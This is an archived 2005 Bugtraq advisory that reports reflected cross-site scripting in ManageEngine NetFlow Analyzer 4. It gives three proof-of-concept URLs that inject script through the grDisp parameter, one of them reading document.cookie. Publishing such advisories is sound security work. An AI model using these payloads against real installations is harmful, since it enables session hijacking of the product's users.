NetFlow Analyzer 4 XSS Vulnerability

why_at_nsfocus.com
Date: 10/18/05

Next message: retrogod_at_aliceposta.it: "e107 remote commands execution"

Previous message: Clayton Kossmeyer: "Re: [Full-disclosure] Ciscos VPN-Client-Passwords can be decrypted"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 18 Oct 2005 03:37:24 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=>alert(document.cookie)</script>

Why, why@nsfocus.com

Next message: retrogod_at_aliceposta.it: "e107 remote commands execution"

Previous message: Clayton Kossmeyer: "Re: [Full-disclosure] Ciscos VPN-Client-Passwords can be decrypted"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]